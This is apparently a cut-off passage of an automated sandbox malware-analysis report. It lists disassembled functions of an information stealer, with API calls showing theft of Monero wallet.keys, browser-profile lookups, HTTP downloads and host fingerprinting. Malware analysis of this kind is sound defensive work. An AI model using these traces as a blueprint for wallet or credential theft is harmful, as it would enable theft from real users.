                                                                                                                                                                                                                      Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410AA7
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                                                                                                                                        • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                                                                        • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                                                                                                                                        • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                                                                                        • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                      • String ID: wA$:\$C$QuBi
                                                                                                                                                                                                                      • API String ID: 1856320939-1441494722
                                                                                                                                                                                                                      • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                                                                                                                      • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                                                                                                                                      Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                                                                                                                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                      • String ID: <+A
                                                                                                                                                                                                                      • API String ID: 2507841554-2778417545
                                                                                                                                                                                                                      • Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                                                                                                                      • Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9
                                                                                                                                                                                                                      Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                        • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                      • API String ID: 4174444224-1526165396
                                                                                                                                                                                                                      • Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                                                                                                                      • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                                                                                                                                      Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                                                      • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                      • API String ID: 3722407311-2697854757
                                                                                                                                                                                                                      • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                                                                                      • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                                                                                                                                      Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00401ADC
                                                                                                                                                                                                                        • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                                                                        • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                                                                        • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                                                                        • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                                                                        • Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00401C9D
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                                      • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                                      • API String ID: 615783205-3586502688
                                                                                                                                                                                                                      • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                                                                                                                      • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                                                                                                                                                      Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86
                                                                                                                                                                                                                        • Part of subcall function 00415B0B: DeleteFileA.KERNEL32(?), ref: 00415CA9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                      • String ID: LzA
                                                                                                                                                                                                                      • API String ID: 1546541418-1388989900
                                                                                                                                                                                                                      • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                                                                                                                      • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                                                                                                                                                      Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040FBC1
                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                                                                                                                                        • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
